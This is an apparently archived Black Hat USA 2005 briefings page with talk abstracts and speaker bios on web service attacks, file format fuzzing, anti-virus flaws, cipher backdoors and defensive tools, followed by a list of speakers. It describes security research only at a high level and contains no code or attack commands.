Attacking Web Services: The Next Generation of Vulnerable Enterprise Apps
Alex Stamos, Founding Partner, Information Security Partners
Scott Stender, Founding Partner, Information Security Partners

Web Services represent a new and unexplored set of security-sensitive technologies that have been widely deployed by large companies, governments, financial institutions, and in consumer applications.   Unfortunately, the attributes that make web services attractive, such as their ease of use, platform independence, use of HTTP and powerful functionality, also make them a great target for attack. 

In this talk, we will explain the basic technologies (such as XML, SOAP, and UDDI) upon which web services are built, and explore the innate security weaknesses in each.  We will then demonstrate new attacks that exist in web service infrastructures, and show how classic web application attacks (SQL Injection, XSS, etc…) can be retooled to work with the next-generation of enterprise applications.

The speakers will also demonstrate some of the first publicly available tools for finding and penetrating web service enabled systems.

Alex Stamos is a founding partner of iSEC Partners, LLC, a strategic digital security organization, with several years experience in security and information technology.  Alex is an experienced security engineer and consultant specializing in application security and securing large infrastructures, and has taught many classes in network and application security.

Before he helped form iSEC Partners, Alex spent two years as a Managing Security Architect with @stake.  Alex performed as a technical leader on many complex and difficult assignments, including a thorough penetration test and architectural review of a 6 million line enterprise management system, a secure re-design of a multi-thousand host ASP network, and a thorough analysis and code review of a major commercial web server.  He was also one of @stake’s West Coast trainers, educating select technical audiences in advanced network and application attacks.

Before @stake, Alex had operational security responsibility over 50 Fortune-500 web applications.  He has also worked at a DoE National Laboratory.  He holds a BSEE from the University of California, Berkeley, where he participated in research projects related to distributed secure storage and automatic C code auditing.

Scott Stender is a founding partner of iSEC Partners, LLC, a strategic digital security organization.  Scott brings with him several years of experience in large-scale software development and security consulting.  Prior to iSEC, Scott worked as an application security analyst with @stake where he led and delivered on many of @stake’s highest priority clients.

Before @stake, Scott worked for Microsoft Corporation where he was responsible for security and reliability analysis for one of Microsoft’s distributed enterprise applications.  In this role, Scott drew on his technical expertise in platform internals, server infrastructure, and application security, combined with his understanding of effective software development processes to concurrently improve the reliability, performance, and security of a product running on millions of computers worldwide.

In his research, Scott focuses on secure software engineering methodology and security analysis of core technologies.  Most recently, Scott was published in the January-February 2005 issue of "IEEE Security & Privacy", where he co-authored a paper entitled "Software Penetration Testing".  He holds a BS in Computer Engineering from the University of Notre Dame.

Return to the top of the page

The Art of File Format Fuzzing
Michael Sutton, Director, iDEFENSE Labs
Adam Greene, Senior Security Engineer, iDEFENSE

In September 2004, much hype was made of a buffer overflow vulnerability that existed in the Microsoft engine responsible for processing JPEG files. While the resulting vulnerability itself was nothing new, the fact that a vulnerability could be caused by a non-executable file commonly traversing public and private networks was reason for concern. File format vulnerabilities are emerging as more and more frequent attack vector. These attacks take advantage of the fact that an exploit can be carried within non-executable files that were previously considered to be innocuous. As a result, firewalls and border routers rarely prevent the files from entering a network when included as email attachments or downloaded from the Internet.

As with most vulnerabilities, discovering file format attacks tends to be more art than science. We will present various techniques that utilize file format fuzzing that range from pure brute force fuzzing to intelligent fuzzing that requires an understanding of the targeted file formats. We will present a methodology for approaching this type of research and address issues such as automating the process. Techniques will be discussed to address challenges such as attacking proprietary file formats, overcoming exception handling and reducing false positives. The presentation will include demonstrations of  fuzzing tools designed for both the *nix and Windows platforms that will be released at the conference and the disclosure of vulnerabilities discovered during the course of our research.

Michael Sutton is a Director for iDEFENSE, a security intelligence company located in Reston, VA. He heads iDEFENSE Labs and the Vulnerability Aggregation Team (VAT). iDEFENSE Labs is the research and development arm of the company, which is responsible for discovering original security vulnerabilities in hardware and software implementations, while VAT focuses on researching publicly known vulnerabilities. His other responsibilities include developing tools and methodologies to further vulnerability research, and managing the iDEFENSE Vulnerability Contributor Program (VCP).

Prior to joining iDEFENSE, Michael established the Information Systems Assurance and Advisory Services (ISAAS) practice for Ernst & Young in Bermuda. He is a frequent presenter at information security conferences.

Michael obtained his Certified Information Systems Auditor (CISA) designation in 1998 and is a member of Information Systems Audit and Control Association (ISACA). He has completed a Master of Science in Information Systems Technology degree at George Washington University, has a Bachelor of Commerce degree from the University of Alberta and is a Chartered Accountant. Outside of the office, he is a Sergeant with the Fairfax Volunteer Fire Department.

Adam Greene is a Security Engineer for iDEFENSE, a security intelligence company located in Reston, VA.  His responsibilities at iDEFENSE include researching original vulnerabilities and developing exploit code as well as verifying and analyzing submissions to the iDEFENSE Vulnerability Contributor Program.

His interests in computer security lie mainly in reliable exploitation methods, fuzzing, and UNIX based system auditing and exploit development.  In his time away from computers he has been known to enjoy tea and foosball with strange old women.

Return to the top of the page

Ozone HIPS: Unbreakable Windows
Eugene Tsyrklevich

Windows is the number one target on the Internet today. It takes less than 5 minutes for an unpatched Windows machine, connected to the Internet, to get owned. Yet the most prevalent security practices still consist of running anti-viruses and constant patching.

This presentation introduces a new tool, called Ozone, that is designed to protect against most of the commonly exploited attack vectors. To protect against the most common of these, buffer overflows, Ozone uses an address space randomization technique. In addition, Ozone runs all processes in a sandbox that severely limits what a compromised process is allowed to do. Finally, Ozone protects itself and the underlying operating system against further attacks.

Eugene Tsyrklevich has an extensive security background ranging from designing and implementing Host Intrusion Prevention Systems to training people in research, corporate, and military environments. Eugene has presented his research at a number of security conferences including Usenix Security, BlackHat Europe and BlackHat USA. Eugene holds both a Bachelor and a Masters degree in Computer Science from the University of California, San Diego.

Return to the top of the page

World Exclusive – Announcing the OWASP Guide To Securing Web Applications and Services 2.0
Andrew van der Stock, Technical Editor, OWASP Guide 2.0, OWASP Foundation

After three years of community development, the Open Web Application Security Project (OWASP) is proud to introduce the next generation of web application security standards at BlackHat USA 2005. The Guide to Securing Web Applications and Services 2.0 is a major new release – written from the ground up, with many new sections covering common and emerging risks, including:

  • How to design more secure software
  • How to conduct a security review using the Guide
  • How to perform the most difficult web application processes correctly: processing credit cards, interacting with payment gateways (such as PayPayl), and anti-phishing controls
  • Reorganized and easily navigated chapters on web application controls including: web services, comprehensive authentication and authorization controls, session management, data validation, interpreter injection, and many new controls within existing chapters
  • Secure configuration and deployment
  • And software quality assurance.

The Guide has adopted and extended the popular OWASP Top 10 approach – security objectives, how to identify if you are at risk, with recommended remediations in three popular frameworks, and further reading. The Guide is platform neutral, and has examples in J2EE, ASP.NET and PHP. The Guide 2.0 is on the conference materials CD-ROM in its entirety. As it is free (as in beer as well as in freedom), you can redistribute or print it as often as you wish.

To demonstrate the incredible versatility of the Guide and its pragmatic approach, we will be conducting a live security review of software selected at random by the audience. To perform the review demonstration, we will be using just a few off-the-shelf web development tools with Firefox to demonstrate how easy it is to subvert the average application, and how simple it is to fix issues properly by using the Guide.

We expect this talk will be useful to all attendees, but those who set secure coding standards within their organization, manage risk from custom software, manage software development or are software architects or developers will benefit the most from attending this session.

Andrew van der Stock is among the many contributors to the OWASP project over the years. Andrew has presented at many conferences, including BlackHat USA,, and AusCERT, and is a leading Australian web application researcher. He helps run the OWASP Melbourne chapter, started the OWASP Sydney chapter, and is ex-President of SAGE-AU, the System Administrator’s Guild of Australia. You can read more about OWASP, the Open Web Application Security Project at and you can read more about Andrew at  

Return to the top of the page

Preventing Child Neglect in DNSSEC-bis using Lookaside Validation
Paul Vixie

Paul Vixie has been contributing to Internet protocols and UNIX systems as a protocol designer and software architect since 1980. Early in his career, he developed and introduced sends, proxynet, rtty, cron and other lesser-known tools.

Today, Paul is considered the primary modern author and technical architect of BINDv8 the Berkeley Internet Name Domain Version 8, the open source reference implementation of the Domain Name System (DNS). He formed the Internet Software Consortium (ISC) in 1994, and now acts as Chairman of its Board of Directors. The ISC reflects Paul's commitment to developing and maintaining production quality open source reference implementations of core Internet protocols.

More recently, Paul cofounded MAPS LLC (Mail Abuse Prevention System), a California nonprofit company established in 1998 with the goal of hosting the RBL (Realtime Blackhole List) and stopping the Internet's email system from being abused by spammers. Vixie is currently the Chief Technology Officer of Metromedia Fiber Network Inc (MFNX.O).

Along with Frederick Avolio, Paul co-wrote "Sendmail: Theory and Practice" (Digital Press, 1995). He has authored or co-authored several RFCs, including a Best Current Practice document on "Classless IN-ADDR.ARPA Delegation" (BCP 20). He is also responsible for overseeing the operation of, one of the thirteen Internet root domain name servers.

Return to the top of the page

Owning Anti-Virus: Weaknesses in a Critical Security Component
Alex Wheeler, Independent Security Consultant
Neel Mehta, X-Force Research Engineer, Internet Security Systems

AV software is becoming extremely popular because of the its percieved protection. Even the average person is aware they want AV on their computer (see AOL, Netscape, Netzero, Earthlink, and other ISP television ads). What if: Instead of protecting ppl from hackers AV software was actually making it easier for hackers?

This talk will outline general binary auditing techniques using AV software as an example, and demonstrate examples of remote AV vulnerabilities discovered using those techniques.

Alex Wheeler is a security researcher, who specializes in reversing engineering binaries for security vulnerabilities. His research experience was cultivated during his time with ISS X-Force, which he spent auditing critical network applications and technologies for security vulnerabilities. Alex's recent audit focus on AV products has lead to the discovery of serious systemic and point vulnerabilities in many major AV products.

Neel Mehta works as an application vulnerability researcher at ISS X-Force, and like many other security researchers comes from a reverse-engineering background. His reverse engineering experience was cultivated through extensive consulting work in the copy protection field, and has more recently been focused on application security. Neel has done extensive research into binary and source-code auditing, and has applied this knowledge to find many vulnerabilities in critical and widely deployed network applications.

Return to the top of the page

Building Robust Backdoors In Secret Symmetric Ciphers
Adam L. Young, Ph.D, Senior Managing Consultant, LECG

This talk will present recent advances in the design of robust cryptographic backdoors in secret symmetric ciphers (i.e., classified or proprietary ciphers). The problem directly affects end-users since corporations and governments have in the past produced secret symmetric ciphers for general use (e.g., RC4 and Skipjack, respectively).

The problem itself is challenging since it involves leaking secret key material in the ciphertexts that are produced by a deterministic function, whereas traditional subliminal channels have relied on the use of randomized cryptographic algorithms. Such attacks can be regarded as advanced Trojan horse attacks since the secret block cipher securely and subliminally transmits the symmetric key of the sender and receiver to the malicious designer and confidentiality holds even when the cipher is made public. The material that will be surveyed was published in Fast Software Encryption (FSE '98), the Australasian Conference on Information Security and Privacy (ACISP '03), and Selected Areas in Cryptography (SAC '04).

Adam Young received his BS degree in Electrical Engineering from Yale University in '94, his MS degree in Computer Science from Columbia University in '96. He was awarded his PhD degree in Computer Science with distinction from Columbia University in '02. He has authored publications in IEEE Foundations of Computer Science, Crypto, Eurocrypt, Asiacrypt, Security in Communication Networks (SCN), Fast Software Encryption, Algorithmic Number Theory Symposium (ANTS), PKC, CT-RSA, SAC, IEEE Security & Privacy, Cryptographic Hardware and Embedded Systems (CHES), ACISP, and the IEEE Information Assurance Workshop.

He is the author of the book "Malicious Cryptography: Exposing Cryptovirology" that is co-authored with Dr. Moti Yung. Adam has given invited talks at Xerox PARC, MITRE, Bell Labs, NYU, Sandia National Labs, the Naval Postgraduate School, the AMS-MMS special session on coding theory and cryptography, and the 2nd International Conference on Advanced Technologies for Homeland Security (ICATHS '04). In April Adam will be giving a talk at the DIMACS Workshop on Theft in E-Commerce that is being held at Rutgers University.

Adam's work experience includes serving as a cryptographic consultant for CertCo, Inc., performing research for Lucent as a Member of Technical Staff, acting as a Principal Engineer for Lockheed Martin Global Telecommunications, and conducting Federally funded research for the DoD.

Return to the top of the page

The Unveiling of My Next Big Project
Philip R. Zimmermann, Creator, Pretty Good Privacy

Philip R. Zimmermann is the creator of Pretty Good Privacy. For that, he was the target of a three-year criminal investigation, because the government held that US export restrictions for cryptographic software were violated when PGP spread all around the world following its 1991 publication as freeware. Despite the lack of funding, the lack of any paid staff, the lack of a company to stand behind it, and despite government persecution, PGP nonetheless became the most widely used email encryption software in the world.

Phil has been working on a new project and plans to have freeware ready for all Black Hat attendees.

Return to the top of the page

Akshay Aggarwal

Joseph Ansanelli

Ofir Arkin

Richard Baich

Dennis Bailey

Edward Balas

Darrin Barrall

Marshall Beddoe


Renaud Bidou

Scott Blake

Adam Boileau

Joyce Brocaglia

Jamie Butler

Jon Callas

Kevin Cardwell

Cesar Cerrudo

Tzi-cker Chiueh

Jim Christy

Robert W. Clark

Ian Clarke

Tyler Close

Greg Conti

Bryan Cunningham

David Dewey

Himanshu Dwivedi

Arian J. Evans

Yuan Fan

Esteban Martínez Fayó

James C. Foster

Pamela Fusco

Kenneth Geers

Andre Gold

Joe Grand

Jennifer Stisa Granick

Adam Greene

Jeremiah Grossman

the Grugq

Robert J. Hansen

Allen Harper

Jim Harper

Kelly Hansen

Ken Hines

Barnaby Jack

Dan Kaminsky

Joseph Klein

Alexander Kornbrust

Ben Laurie

David Litchfield

Vincent T. Liu

Johnny Long

Michael Lynn


Kevin Mahaffey

Kevin Mandia

David Maynor

Mark McGovern

Rhonda E. MacLean

Neel Mehta

C. Forrest Morgan

Robert Morris

David Mortman

Shawn Moyer


Ejovi Nuwere

Gunter Ollmann

Meredith L. Patterson

Ryan Permeh

Ken Pfeil

Mike Pomraning

Bruce Potter

Paul Proctor

Oskar Sandberg


Adam Shostack

Paul Simmonds

Simple Nomad


Derek Soeder

Justin Somaini

Sherri Sparks


Alex Stamos

Scott Stender

Michael Sutton

Daniel Thompson

Eugene Tsyrklevich

Andrew van der Stock

Mikko Varpiola

Alex Wheeler

Adam L. Young

Philip R. Zimmermann

Black Hat Logo
(c) 1996-2007 Black Hat